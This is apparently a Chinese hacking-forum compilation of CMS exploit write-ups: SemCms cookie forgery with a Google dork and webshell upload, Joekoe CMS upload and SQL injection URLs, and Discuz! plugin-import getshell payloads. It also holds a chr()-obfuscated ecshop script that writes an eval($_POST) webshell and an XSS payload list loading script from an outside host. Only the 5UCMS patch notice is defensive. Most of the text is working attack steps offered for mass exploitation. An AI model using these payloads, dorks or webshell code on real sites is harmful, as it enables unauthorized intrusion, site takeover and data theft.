SemCms后台cookie欺骗漏洞
Google关键字:inurl:P_view asp?pid=
漏洞文件:Clkj_Inc\WebOut.asp
发现日期:2011/03/26
利用cookies:username=uname=admin;userpas=upas=admin;
打开啊D注入工具或者其他的可以修改cookie的工具,修改成以上的cookies,再登录后台Clkj_Admin/nimda_admin.asp,广告管理,上传图片,有个自定义图片名称的功能,输入st999.asp;.再上传,右键查看源码,拿到shell地址就OK了。
漏洞文件的源码:
WebOut.asp
<%
if trim(request.cookies("username")("uname"))<>"" then
session("username")=request.cookies("username")("uname")
session("userpas")=request.cookies("userpas")("upas")
else if trim(session("username"))="" or trim(session("userpas"))="" then
Response.Write "<script language='javascript'>alert('用户名与密码为空请重新进入!');top.location.href='index.html';</script>"
end if
end if
%>
<script src="http://www.sem-cms.com/huidiao.asp?url=<%=Request.ServerVariables("SERVER_NAME")%>"></script>
看了源码,诸君都了解了吧
喜欢批量的朋友速度吧。。。
我试了下,貌似是通杀以前的版本的。。。。。
joekoe CMS 4.0 两个漏洞
所以顺便找了下这个漏洞。。看了下牛牛的分析。。读懂了里面的意思
所以顺便也发上来
把这个迟来的漏洞给大家看看
----------------------------------------------
乔客(joekoe) CMS 4.0 的2个高危漏洞
前段时间读了读乔客,发现在乔客4.0版本中存在两个高危漏洞,一个上传漏
洞,可以随意上传任意文件,包括ASP,另一个是SQL注入,甚至还有返回错误信息,可
怕啊
上传漏洞:
看\common\include\web.upload.asp 中的代码
----------------------------------------------------------------------
-------------------------------------------------------------
sub doPageLoad()
if APP_STATUS="close" then
treeData.addItem "_status","error.message"
treeData.addItem "_message","网站暂时因关闭维护中!请稍候..."
exit sub
end if
up.doInit()
if not upConfig.isInit then
treeData.addItem "_status","error.message"
treeData.addItem "_message","上传文件的参数不正确!"
else
doPageLoadUser()
select case upConfig.channel
case "forum"
upConfig.setSaveDir(upConfig.getSaveDir&(left
(ops.time.toConvertString("",10),6)&DIR_SEPARATOR))
upConfig.filename=""
case "user.face"
upConfig.filename="face_"&upConfig.userid
upConfig.setSaveDir("face"&DIR_SEPARATOR)
upConfig.filetype="gif"
case "blog.logo"
upConfig.setSaveDir("blog"&DIR_SEPARATOR)
upConfig.filetype="gif"
case else
if instr(upConfig.channel,".")>0 then
upConfig.setSaveDir(mid(upConfig.channel,1,instr
(upConfig.channel,".")-1)&DIR_SEPARATOR)
end if
if instr(upConfig.fileinput,"url")>0 then
upConfig.filetype="affix"
end if
end select
if len(upConfig.getSaveDir())<3 then
treeData.addItem "_status","error.message"
treeData.addItem "_message","上传文件的参数不正确!"
exit sub
end if
if 1=1 then
upConfig.setData "zoom.channel.width",120
upConfig.setData "zoom.channel.height",90
end if
upConfig.setBaseDir(DIR_ROOT&DIR_UPLOAD)
upConfig.setBasePath(opsDirPath(DIR_ROOT&DIR_UPLOAD))
upConfig.setBaseURL(URL_UPLOAD)
up.doLoad()
end if
end sub
----------------------------------------------------------------------
-------------------------------------------------------------
这段代码通过channel判断是否给上传类型赋值,如果channel不等于forum、
user.face、blog.logo的时候判断fileinput是否包含url,如果不包含,
upConfig.filetype就不赋值,继续往下看
----------------------------------------------------------------------
--
if up.isPost() then
call doParseUploadData()
treeData.addItem "_status","succeed"
dim tmpFormMode,tmpFileValue,tmpThumbValue
tmpFormMode="set"
if upConfig.channel="user.face" then
tmpLinkMode="no"
tmpFileValue="#"&up.getFileInfo("filename")
else
tmpFileValue=up.getFileInfo("file.path")
select case upConfig.filetype
case "file"
tmpLinkMode="no"
'tmpFileValue=up.getFileInfo("file.path")
case "pic","spic","pics","affix","gif","jpg","jpeg","bmp","png"
tmpLinkMode="no"
tmpThumbValue=up.getFileInfo("thumb.path")
case else
tmpLinkMode="again"
tmpFormMode="append"
dim tmpFileType:tmpFileType=lcase(up.getFileInfo("filetype"))
select case tmpFileType
case "gif","jpg","jpeg","bmp","png"
tmpFileValue=""
case "swf"
tmpFileValue=""
case else
tmpFileValue="[download="&tmpFileType&"]upload_download.asp?
id="&upConfig.fileid&"[/download]"
end select
end select
end if
treeData.addItem "_form.mode",tmpFormMode
treeData.addItem "_form.filevalue",tmpFileValue
treeData.addItem "_form.thumbvalue",tmpThumbValue
end if
----------------------------------------------------------------------
------------------------------
这段代码判断upConfig.filetype,然后定义上传文件的后缀名,只要之前
upConfig.filetype没被赋值,且不是gif,jpg,jpeg,bmp,png,swf,就
tmpFileValue="[download="&tmpFileType&"]upload_download.asp?
id="&upConfig.fileid&"[/download]",看到这个,大家眼睛都放光了,根据用
户的定义来判断上传类型,就好比问一个要偷东西的人:“你是贼么?”,这段
代码也太XX了,估计之前也有不少人读出来了,只不过没公开而已
SQL注入漏洞
还是在web.upload.asp中:
----------------------------------------------------------------------
----------------------------------
...........
sub doParseUploadData()
dim tmpFilePath,tmpFileType,tmpFileSize,tmpName
tmpFilePath=up.getFileInfo("file.path")
tmpFileType=up.getFileInfo("filetype")
tmpFileSize=opsCommon.toInt(up.getFileInfo("filesize"))
tmpName=up.getFileInfo("name")
dim tmpChannel,tmpDataid,tmpType,tmpSQL,tmpID
tmpChannel=upConfig.channel
tmpDataid=0
tmpType=0
select case upConfig.channel
case "user.face"
tmpDataid=upConfig.userid
tmpChannel="face"
tmpType=1
tmpSQL="select top 1 u_id from db_sys_upload where
nsort='"&tmpChannel&"' and iid="&tmpDataid&""
case "blog.logo"
tmpDataid=toInt(ops.client.getSession("user.blogid"))
if tmpDataid<1 then tmpDataid=upConfig.userid
tmpChannel="blog"
tmptype=1
tmpSQL="select top 1 u_id from db_sys_upload where
nsort='"&tmpChannel&"' and iid="&tmpDataid&""
case else
tmpSQL="select top 1 u_id from db_sys_upload where
u_url='"&tmpFilePath&"'"
end select
..........
----------------------------------------------------------------------
---------------------------------------
看这句tmpSQL="select top 1 u_id from db_sys_upload where
u_url='"&tmpFilePath&"'",u_url来自&tmpFilePath&,而&tmpFilePath&来自
up.getFileInfo("file.path"),呵呵,没有经过任何过滤就放到SQL查询语句里
面查询了。
利用方法:
1 .上传漏洞:很好利用,把channel变量改一下,只要不等于forum、
user.face、blog.logo就行,然后filetype改成asa,就可以光明正大的上传木马
了,具体url可以这样common/upload.asp?
channel=use&filetype=asa&filename=&fileinput=u_face&formname=&thumbname
=&thumbinput=,然后上传
2. SQL注入漏洞:在Channel变量中加入诸如语句,比如:
common/upload.asp?
channel=use'&filetype=gif&filename=&fileinput=u_face&formname=&thumbnam
e=&thumbinput=,然后上传,就会报错
----------------------------------------------------------------------
------------------------------------------------------------
Joekoe CMS 4.0
错误信息:
select top 1 u_id from db_sys_upload where
u_url='user'/20070722031234c.gif'
原始错误:
Error #-2147217900, 第 1 行: 'c' 附近有语法错误。 Microsoft OLE DB
Provider for SQL Server
返回首页
Processed in 0.188 s, 1 queries, 54 Cache.
*-------------------------
自己试过。。上传没什么问题。。
后面的SQL。。好像已经没什么用了!!自己试吧!
Discuz!后台怎么拿到Webshell
一 Discuz! 6.0 和 Discuz! 7.0
既然要后台拿Shell,文件写入必看。
/include/cache.func.php
往上翻,找到调用函数的地方.都在updatecache函数中.
如果我们可以控制$plugin['identifier']就有机会,它是plugins表里读出来的.
01
if
(!
$cachename
||
$cachename
==
'plugins'
) {
02
$query
=
$db
->query(
"SELECT pluginid, available, adminid, name, identifier, datatables, directory, copyright, modules FROM {$tablepre}plugins"
);
03
while
(
$plugin
=
$db
->fetch_array(
$query
)) {
04
$data
=
array_merge
(
$plugin
,
array
(
'modules'
=>
array
()),
array
(
'vars'
=>
array
()));
05
$plugin
[
'modules'
] = unserialize(
$plugin
[
'modules'
]);
06
if
(
is_array
(
$plugin
[
'modules'
])) {
07
foreach
(
$plugin
[
'modules'
]
as
$module
) {
08
$data
[
'modules'
][
$module
[
'name'
]] =
$module
;
09
}
10
}
11
$queryvars
=
$db
->query(
"SELECT variable, value FROM {$tablepre}pluginvars WHERE pluginid='$plugin[pluginid]'"
);
12
while
(
$var
=
$db
->fetch_array(
$queryvars
)) {
13
$data
[
'vars'
][
$var
[
'variable'
]] =
$var
[
'value'
];
14
}
15
//注意
16
writetocache(
$plugin
[
'identifier'
],
''
,
"\$_DPLUGIN['$plugin[identifier]'] = "
.arrayeval(
$data
),
'plugin_'
);
17
}
18
}
去后台看看,你可以发现identifier对应的是唯一标示符.联想下二次注射,单引号从数据库读出后写入文件时不会被转义.贱笑一下.
但是……你懂的,当你去野区单抓对面DPS时,发现对面蹲了4个敌人的心情.
/admin/plugins.inc.php
还好Discuz!提供了导入的功能,好比你有隐身,对面没粉.你有疾风步,对面没控.好歹给咱留条活路.
01
if
((
$newname
= trim(
$newname
)) || (
$newidentifier
= trim(
$newidentifier
))) {
02
if
(!
$newname
) {
03
cpmsg(
'plugins_edit_name_invalid'
);
04
}
05
$query
=
$db
->query(
"SELECT pluginid FROM {$tablepre}plugins WHERE identifier='$newidentifier' LIMIT 1"
);
06
//下面这个让人蛋疼欲裂,ispluginkey判定newidentifier是否有特殊字符
07
if
(
$db
->num_rows(
$query
) || !
$newidentifier
|| !ispluginkey(
$newidentifier
)) {
08
cpmsg(
'plugins_edit_identifier_invalid'
);
09
}
10
$db
->query(
"INSERT INTO {$tablepre}plugins (name, identifier, available) VALUES ('"
.dhtmlspecialchars(trim(
$newname
)).
"', '$newidentifier', '0')"
);
11
}
12
//写入缓存文件
13
updatecache(
'plugins'
);
14
updatecache(
'settings'
);
15
cpmsg(
'plugins_edit_succeed'
,
'admincp.php?action=pluginsconfig'
);
随便新建一个插件,identifier为shell,生成文件路径及内容.然后导出备用.
01
elseif
(submitcheck(
'importsubmit'
)) {
02
03
$plugindata
= preg_replace(
"/(#.*\s+)*/"
,
''
,
$plugindata
);
04
$pluginarray
= daddslashes(unserialize(
base64_decode
(
$plugindata
)), 1);
05
//解码后没有判定
06
if
(!
is_array
(
$pluginarray
) || !
is_array
(
$pluginarray
[
'plugin'
])) {
07
cpmsg(
'plugins_import_data_invalid'
);
08
}
elseif
(
empty
(
$ignoreversion
) &&
strip_tags
(
$pluginarray
[
'version'
]) !=
strip_tags
(
$version
)) {
09
cpmsg(
'plugins_import_version_invalid'
);
10
}
11
12
$query
=
$db
->query(
"SELECT pluginid FROM {$tablepre}plugins WHERE identifier='{$pluginarray[plugin][identifier]}' LIMIT 1"
);
13
//判断是否重复,直接入库
14
if
(
$db
->num_rows(
$query
)) {
15
cpmsg(
'plugins_import_identifier_duplicated'
);
16
}
17
18
$sql1
=
$sql2
=
$comma
=
''
;
19
foreach
(
$pluginarray
[
'plugin'
]
as
$key
=>
$val
) {
20
if
(
$key
==
'directory'
) {
21
//compatible for old versions
22
$val
.= (!
empty
(
$val
) &&
substr
(
$val
, -1) !=
'/'
) ?
'/'
:
''
;
23
}
24
$sql1
.=
$comma
.
$key
;
25
$sql2
.=
$comma
.
'\''
.
$val
.
'\''
;
26
$comma
=
','
;
27
}
28
$db
->query(
"INSERT INTO {$tablepre}plugins ($sql1) VALUES ($sql2)"
);
29
$pluginid
=
$db
->insert_id();
30
31
foreach
(
array
(
'hooks'
,
'vars'
)
as
$pluginconfig
) {
32
if
(
is_array
(
$pluginarray
[
$pluginconfig
])) {
33
foreach
(
$pluginarray
[
$pluginconfig
]
as
$config
) {
34
$sql1
=
'pluginid'
;
35
$sql2
=
'\''
.
$pluginid
.
'\''
;
36
foreach
(
$config
as
$key
=>
$val
) {
37
$sql1
.=
','
.
$key
;
38
$sql2
.=
',\''
.
$val
.
'\''
;
39
}
40
$db
->query(
"INSERT INTO {$tablepre}plugin$pluginconfig ($sql1) VALUES ($sql2)"
);
41
}
42
}
43
}
44
45
updatecache(
'plugins'
);
46
updatecache(
'settings'
);
47
cpmsg(
'plugins_import_succeed'
,
'admincp.php?action=pluginsconfig'
);
48
49
}
/forumdata/cache/plugin_shell.php
我们可以输入任意数据,唯一要注意的是文件名的合法性.感谢微软,下面的文件名是合法的.
01
<?php
02
//Discuz! cache file, DO NOT modify me!
03
//Created: Mar 17, 2011, 16:56
04
//Identify: 7c0b5adeadf5a806292d45c64bd0659c
05
06
$_DPLUGIN
[
'shell'
] =
array
(
07
'pluginid'
=>
'11'
,
08
'available'
=>
'0'
,
09
'adminid'
=>
'0'
,
10
'name'
=>
'Getshell'
,
11
'identifier'
=>
'shell'
,
12
'datatables'
=>
''
,
13
'directory'
=>
''
,
14
'copyright'
=>
''
,
15
'modules'
=>
16
array
(
17
),
18
'vars'
=>
19
array
(
20
),
21
)?>
/forumdata/cache/plugin_a']=phpinfo();$a['a.php
最后是编码一次,给成Exp:
01
<?php
02
//Discuz! cache file, DO NOT modify me!
03
//Created: Mar 17, 2011, 16:56
04
//Identify: 7c0b5adeadf5a806292d45c64bd0659c
05
06
$_DPLUGIN
[
'a'
]=phpinfo();
$a
[
'a'
] =
array
(
07
'pluginid'
=>
'11'
,
08
'available'
=>
'0'
,
09
'adminid'
=>
'0'
,
10
'name'
=>
'Getshell'
,
11
'identifier'
=>
'shell'
,
12
'datatables'
=>
''
,
13
'directory'
=>
''
,
14
'copyright'
=>
''
,
15
'modules'
=>
16
array
(
17
),
18
'vars'
=>
19
array
(
20
),
21
)?>
01
<?php
02
$a
= unserialize(
base64_decode
("YToyOntzOjY6InBsdWdpbiI7YTo5OntzOjk6ImF2YWlsYWJsZSI7czoxOiIw
03
IjtzOjc6ImFkbWluaWQiO3M6MToiMCI7czo0OiJuYW1lIjtzOjg6IkdldHNo
04
ZWxsIjtzOjEwOiJpZGVudGlmaWVyIjtzOjU6IlNoZWxsIjtzOjExOiJkZXNj
05
cmlwdGlvbiI7czowOiIiO3M6MTA6ImRhdGF0YWJsZXMiO3M6MDoiIjtzOjk6
06
ImRpcmVjdG9yeSI7czowOiIiO3M6OToiY29weXJpZ2h0IjtzOjA6IiI7czo3
07
OiJtb2R1bGVzIjtzOjA6IiI7fXM6NzoidmVyc2lvbiI7czo1OiI2LjAuMCI7
08
fQ=="));
09
//print_r($a);
10
$a
[
'plugin'
][
'name'
]=
'GetShell'
;
11
$a
[
'plugin'
][
'identifier'
]=
'a\']=phpinfo();$a[\''
;
12
13
print(
base64_encode
(serialize(
$a
)));
14
?>
7.0同理,大家可以自己去测试咯.如果你使用上面的代码,请勾选"允许导入不同版本 Discuz! 的插件"
二 Discuz! 7.2 和 Discuz! X1.5
以下以7.2为例
/admin/plugins.inc.php
先看导入数据的过程,Discuz! 7.2之后的导入数据使用XML,但是7.2保持了向下兼容.X1.5废弃了.
判定了identifier之后,7.0版本之前的漏洞就不存在了.但是它又加入了语言包……
我们只要控制scriptlangstr或者其它任何一个就可以了。
Key这里不通用.
7.2
X1.5
还是看下shell.lang.php的文件格式.
7.2版本没有过滤Key,所以直接用\废掉单引号.
X1.5,单引号转义后变为\',再被替换一次',还是留下了\
而$v在两个版本中过滤相同,比较通用.
X1.5至少副站长才可以管理后台,虽然看不到插件选项,但是可以直接访问/admin.php?frames=yes&action=plugins添加插件
$v通用Exp:
7.2 Key利用
X1.5
01 |
elseif ( $operation == 'import' ) { |
02 |
|
03 |
if (!submitcheck( 'importsubmit' ) && !isset( $dir )) { |
04 |
|
05 |
/*未提交前表单神马的*/ |
06 |
|
07 |
} else { |
08 |
|
09 |
if (!isset( $dir )) { |
10 |
//导入数据解码 |
11 |
$pluginarray = getimportdata( 'Discuz! Plugin' ); |
12 |
} elseif (!isset( $installtype )) { |
13 |
/*省略一部分*/ |
14 |
} |
15 |
//判定你妹啊,两遍啊两遍 |
16 |
if (!ispluginkey( $pluginarray [ 'plugin' ][ 'identifier' ])) { |
17 |
cpmsg( 'plugins_edit_identifier_invalid' , '' , 'error' ); |
18 |
} |
19 |
if (!ispluginkey( $pluginarray [ 'plugin' ][ 'identifier' ])) { |
20 |
cpmsg( 'plugins_edit_identifier_invalid' , '' , 'error' ); |
21 |
} |
22 |
if ( is_array ( $pluginarray [ 'hooks' ])) { |
23 |
foreach ( $pluginarray [ 'hooks' ] as $config ) { |
24 |
if (!ispluginkey( $config [ 'title' ])) { |
25 |
cpmsg( 'plugins_import_hooks_title_invalid' , '' , 'error' ); |
26 |
} |
27 |
} |
28 |
} |
29 |
if ( is_array ( $pluginarray [ 'vars' ])) { |
30 |
foreach ( $pluginarray [ 'vars' ] as $config ) { |
31 |
if (!ispluginkey( $config [ 'variable' ])) { |
32 |
cpmsg( 'plugins_import_var_invalid' , '' , 'error' ); |
33 |
} |
34 |
} |
35 |
} |
36 |
|
37 |
$langexists = FALSE; |
38 |
//你有张良计,我有过墙梯 |
39 |
if (! empty ( $pluginarray [ 'language' ])) { |
40 |
@ mkdir ( './forumdata/plugins/' , 0777); |
41 |
$file = DISCUZ_ROOT. './forumdata/plugins/' . $pluginarray [ 'plugin' ][ 'identifier' ]. '.lang.php' ; |
42 |
if ( $fp = @ fopen ( $file , 'wb' )) { |
43 |
$scriptlangstr = ! empty ( $pluginarray [ 'language' ][ 'scriptlang' ]) ? "\$scriptlang['" . $pluginarray ['plugin '][' identifier ']."' ] = ".langeval( $pluginarray [ 'language' ][ 'scriptlang' ]) : '' ; |
44 |
$templatelangstr = ! empty ( $pluginarray [ 'language' ][ 'templatelang' ]) ? "\$templatelang['" . $pluginarray ['plugin '][' identifier ']."' ] = ".langeval( $pluginarray [ 'language' ][ 'templatelang' ]) : '' ; |
45 |
$installlangstr = ! empty ( $pluginarray [ 'language' ][ 'installlang' ]) ? "\$installlang['" . $pluginarray ['plugin '][' identifier ']."' ] = ".langeval( $pluginarray [ 'language' ][ 'installlang' ]) : '' ; |
46 |
fwrite( $fp , "<?php\n" . $scriptlangstr . $templatelangstr . $installlangstr . '?>' ); |
47 |
fclose( $fp ); |
48 |
} |
49 |
$langexists = TRUE; |
50 |
} |
51 |
|
52 |
/*处理神马的*/ |
53 |
updatecache( 'plugins' ); |
54 |
updatecache( 'settings' ); |
55 |
updatemenu(); |
56 |
|
57 |
/*省略部分代码*/ |
58 |
|
59 |
} |
01 |
function getimportdata( $name = '' , $addslashes = 1, $ignoreerror = 0) { |
02 |
if ( $GLOBALS [ 'importtype' ] == 'file' ) { |
03 |
$data = @implode( '' , file( $_FILES [ 'importfile' ][ 'tmp_name' ])); |
04 |
@unlink( $_FILES [ 'importfile' ][ 'tmp_name' ]); |
05 |
} else { |
06 |
$data = $_POST [ 'importtxt' ] && MAGIC_QUOTES_GPC ? stripslashes ( $_POST [ 'importtxt' ]) : $GLOBALS [ 'importtxt' ]; |
07 |
} |
08 |
include_once DISCUZ_ROOT. './include/xml.class.php' ; |
09 |
$xmldata = xml2array( $data ); |
10 |
if (! is_array ( $xmldata ) || ! $xmldata ) { |
11 |
//向下兼容 |
12 |
if ( $name && !strexists( $data , '# ' . $name )) { |
13 |
if (! $ignoreerror ) { |
14 |
cpmsg( 'import_data_typeinvalid' , '' , 'error' ); |
15 |
} else { |
16 |
return array (); |
17 |
} |
18 |
} |
19 |
$data = preg_replace( "/(#.*\s+)*/" , '' , $data ); |
20 |
$data = unserialize( base64_decode ( $data )); |
21 |
if (! is_array ( $data ) || ! $data ) { |
22 |
if (! $ignoreerror ) { |
23 |
cpmsg( 'import_data_invalid' , '' , 'error' ); |
24 |
} else { |
25 |
return array (); |
26 |
} |
27 |
} |
28 |
} else { |
29 |
//XML解析 |
30 |
if ( $name && $name != $xmldata [ 'Title' ]) { |
31 |
if (! $ignoreerror ) { |
32 |
cpmsg( 'import_data_typeinvalid' , '' , 'error' ); |
33 |
} else { |
34 |
return array (); |
35 |
} |
36 |
} |
37 |
$data = exportarray( $xmldata [ 'Data' ], 0); |
38 |
} |
39 |
if ( $addslashes ) { |
40 |
//daddslashes在两个版本的处理导致了Exp不能通用. |
41 |
$data = daddslashes( $data , 1); |
42 |
} |
43 |
return $data ; |
44 |
} |
01 |
function langeval( $array ) { |
02 |
$return = '' ; |
03 |
foreach ( $array as $k => $v ) { |
04 |
//Key过滤了单引号,但是只过滤了单引号,可以利用\废掉后面的单引号 |
05 |
$k = str_replace ( "'" , '', $k ); |
06 |
//下面的你绝对看不懂啊看不懂,你到底要人家怎么样嘛?你对\有爱? |
07 |
$return .= "\t'$k' => '" . str_replace ( array ( "\\'" , "'" ), array ( "\\\'" , "\'" ), stripslashes ( $v )). "',\n" ; |
08 |
} |
09 |
return "array(\n$return);\n\n" ; |
10 |
} |
01 |
function daddslashes( $string , $force = 0) { |
02 |
!defined( 'MAGIC_QUOTES_GPC' ) && define( 'MAGIC_QUOTES_GPC' , get_magic_quotes_gpc()); |
03 |
if (!MAGIC_QUOTES_GPC || $force ) { |
04 |
if ( is_array ( $string )) { |
05 |
foreach ( $string as $key => $val ) { |
06 |
$string [ $key ] = daddslashes( $val , $force ); |
07 |
} |
08 |
} else { |
09 |
$string = addslashes ( $string ); |
10 |
} |
11 |
} |
12 |
return $string ; |
13 |
} |
01 |
function daddslashes( $string , $force = 1) { |
02 |
if ( is_array ( $string )) { |
03 |
foreach ( $string as $key => $val ) { |
04 |
unset( $string [ $key ]); |
05 |
//过滤了key |
06 |
$string [ addslashes ( $key )] = daddslashes( $val , $force ); |
07 |
} |
08 |
} else { |
09 |
$string = addslashes ( $string ); |
10 |
} |
11 |
return $string ; |
12 |
} |
1 |
<?php |
2 |
$scriptlang [ 'shell' ] = array ( |
3 |
'a' => '1' , |
4 |
'b' => '2' , |
5 |
); |
6 |
|
7 |
?> |
01 |
<? xml version = "1.0" encoding = "ISO-8859-1" ?> |
02 |
< root > |
03 |
< item id = "Title" > <![CDATA[Discuz! Plugin]]> </ item > |
04 |
< item id = "Version" > <![CDATA[7.2]]> </ item > |
05 |
< item id = "Time" > <![CDATA[2011-03-16 15:57]]> </ item > |
06 |
< item id = "From" > <![CDATA[Discuz! Board (http://localhost/Discuz_7.2_SC_UTF8/upload/)]]> </ item > |
07 |
< item id = "Data" > |
08 |
< item id = "plugin" > |
09 |
< item id = "available" > <![CDATA[0]]> </ item > |
10 |
< item id = "adminid" > <![CDATA[0]]> </ item > |
11 |
< item id = "name" > <![CDATA[www]]> </ item > |
12 |
< item id = "identifier" > <![CDATA[shell]]> </ item > |
13 |
< item id = "description" > <![CDATA[]]> </ item > |
14 |
< item id = "datatables" > <![CDATA[]]> </ item > |
15 |
< item id = "directory" > <![CDATA[]]> </ item > |
16 |
< item id = "copyright" > <![CDATA[]]> </ item > |
17 |
< item id = "modules" > <![CDATA[a:0:{}]]> </ item > |
18 |
< item id = "version" > <![CDATA[]]> </ item > |
19 |
</ item > |
20 |
< item id = "version" > <![CDATA[7.2]]> </ item > |
21 |
< item id = "language" > |
22 |
< item id = "scriptlang" > |
23 |
< item id = "a" > <![CDATA[b\]]> </ item > |
24 |
< item id=");phpinfo();?>"> <![CDATA[x]]> </ item > |
25 |
</ item > |
26 |
</ item > |
27 |
</ item > |
28 |
</ root > |
01 |
<? xml version = "1.0" encoding = "ISO-8859-1" ?> |
02 |
< root > |
03 |
< item id = "Title" > <![CDATA[Discuz! Plugin]]> </ item > |
04 |
< item id = "Version" > <![CDATA[7.2]]> </ item > |
05 |
< item id = "Time" > <![CDATA[2011-03-16 15:57]]> </ item > |
06 |
< item id = "From" > <![CDATA[Discuz! Board (http://localhost/Discuz_7.2_SC_UTF8/upload/)]]> </ item > |
07 |
< item id = "Data" > |
08 |
< item id = "plugin" > |
09 |
< item id = "available" > <![CDATA[0]]> </ item > |
10 |
< item id = "adminid" > <![CDATA[0]]> </ item > |
11 |
< item id = "name" > <![CDATA[www]]> </ item > |
12 |
< item id = "identifier" > <![CDATA[shell]]> </ item > |
13 |
< item id = "description" > <![CDATA[]]> </ item > |
14 |
< item id = "datatables" > <![CDATA[]]> </ item > |
15 |
< item id = "directory" > <![CDATA[]]> </ item > |
16 |
< item id = "copyright" > <![CDATA[]]> </ item > |
17 |
< item id = "modules" > <![CDATA[a:0:{}]]> </ item > |
18 |
< item id = "version" > <![CDATA[]]> </ item > |
19 |
</ item > |
20 |
< item id = "version" > <![CDATA[7.2]]> </ item > |
21 |
< item id = "language" > |
22 |
< item id = "scriptlang" > |
23 |
< item id = "a\" > <![CDATA[=>1);phpinfo();?>]]> </ item > |
24 |
</ item > |
25 |
</ item > |
26 |
</ item > |
27 |
</ root > |
01 |
<? xml version = "1.0" encoding = "ISO-8859-1" ?> |
02 |
< root > |
03 |
< item id = "Title" > <![CDATA[Discuz! Plugin]]> </ item > |
04 |
< item id = "Version" > <![CDATA[7.2]]> </ item > |
05 |
< item id = "Time" > <![CDATA[2011-03-16 15:57]]> </ item > |
06 |
< item id = "From" > <![CDATA[Discuz! Board (http://localhost/Discuz_7.2_SC_UTF8/upload/)]]> </ item > |
07 |
< item id = "Data" > |
08 |
< item id = "plugin" > |
09 |
< item id = "available" > <![CDATA[0]]> </ item > |
10 |
< item id = "adminid" > <![CDATA[0]]> </ item > |
11 |
< item id = "name" > <![CDATA[www]]> </ item > |
12 |
< item id = "identifier" > <![CDATA[shell]]> </ item > |
13 |
< item id = "description" > <![CDATA[]]> </ item > |
14 |
< item id = "datatables" > <![CDATA[]]> </ item > |
15 |
< item id = "directory" > <![CDATA[]]> </ item > |
16 |
< item id = "copyright" > <![CDATA[]]> </ item > |
17 |
< item id = "modules" > <![CDATA[a:0:{}]]> </ item > |
18 |
< item id = "version" > <![CDATA[]]> </ item > |
19 |
</ item > |
20 |
< item id = "version" > <![CDATA[7.2]]> </ item > |
21 |
< item id = "language" > |
22 |
< item id = "scriptlang" > |
23 |
< item id = "a'" > <![CDATA[=>1);phpinfo();?>]]> </ item > |
24 |
</ item > |
25 |
</ item > |
26 |
</ item > |
27 |
</ root > |
如果你愿意,可以使用base64_encode(serialize($a))的方法试试7.2获取Webshell.
http://www.t00ls.net/thread-15464-1-1.html
01 |
function writetocache( $script , $cachenames , $cachedata = '' , $prefix = 'cache_' ) { |
02 |
global $authkey ; |
03 |
if ( is_array ( $cachenames ) && ! $cachedata ) { |
04 |
foreach ( $cachenames as $name ) { |
05 |
$cachedata .= getcachearray( $name , $script ); |
06 |
} |
07 |
} |
08 |
|
09 |
$dir = DISCUZ_ROOT. './forumdata/cache/' ; |
10 |
if (! is_dir ( $dir )) { |
11 |
@ mkdir ( $dir , 0777); |
12 |
} |
13 |
if ( $fp = @ fopen ( "$dir$prefix$script.php" , 'wb' )) { |
14 |
fwrite( $fp , "<?php\n//Discuz! cache file, DO NOT modify me!" . |
15 |
"\n//Created: " . date ( "M j, Y, G:i" ). |
16 |
"\n//Identify: " .md5( $prefix . $script . '.php' . $cachedata . $authkey ). "\n\n$cachedata?>" ); |
17 |
fclose( $fp ); |
18 |
} else { |
19 |
exit ( 'Can not write to cache files, please check directory ./forumdata/ and ./forumdata/cache/ .' ); |
20 |
} |
21 |
} |
ecshop后台获取shell最新方法,通杀最新版本&后台低权限
后台-订单管理-订单打印-选择源代码编辑-保存
返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功!
2.把转换后的代码写入订单打印模板(源码模式,写的时候注意两边加闭合):
3.连接文件:
http://localhost/null.php
懒人就用下面的代码,连接文件为根目录下null.php,密码为 usb:
$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);
$a=chr(119);
$fp=@fopen($filen,$a);
$msg=@fwrite($fp,$filec);
if($msg) echo chr(79).chr(75).chr(33);
@fclose($fp);
?>
5UCMS 漏洞通报
漏洞报告:http://www.wooyun.org/bugs/wooyun-2010-01515
漏洞描述:未对是否登录进行判断[重要]、未过滤 ecid 和 cid
防范措施:
打开 admin/ajax.asp
找到 Dim ID,Key,Rs,i 在这行上面加入代码 Call ChkLogin("login")
找到 set rs=db("select [modeext] from [{pre}channel] where id=" & ecid,1) 更改为 set rs=db("select [modeext] from [{pre}channel] where id=" & clng(ecid),1)
找到 set es=db("select [modeindex] from [{pre}content] where id=" & eid,1) 更改为 set es=db("select [modeindex] from [{pre}content] where id=" & clng(eid),1)
漏洞报告:http://www.wooyun.org/bugs/wooyun-2010-01513
漏洞描述:HTTP_REFERER 伪造利用
防范措施:
打开 in/function.asp
找到 if len(Msgstr) > 0 then response.write "<Script>alert('" & Msgstr & "');</Script>" 在这行代码下面加入 response.end
漏洞报告(不成立):http://www.wooyun.org/bugs/wooyun-2010-01543
漏洞描述(不成立):因对 ID 已有过滤,此漏洞不成立,大家可放心
安全建议:
打开 plus/count/js.asp
找到 Call DB("Update [{pre}Content] Set [Views]=[Views]+1 Where [ID]=" & ID,0) 更改为 Call DB("Update [{pre}Content] Set [Views]=[Views]+1 Where [ID]=" & clng(ID),0)
请使用 5uCMS 的朋友根据上面的操作方法更新自己的网站程序,补丁程序将于 3-11 号制作并发布
xss跨站脚本攻击汇总
(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>
(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>
(6)修正缺陷IMG标签
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>
(10)十六进制编码也是没有分号(计算器)
<IMG SRC=java..省略..XSS')>
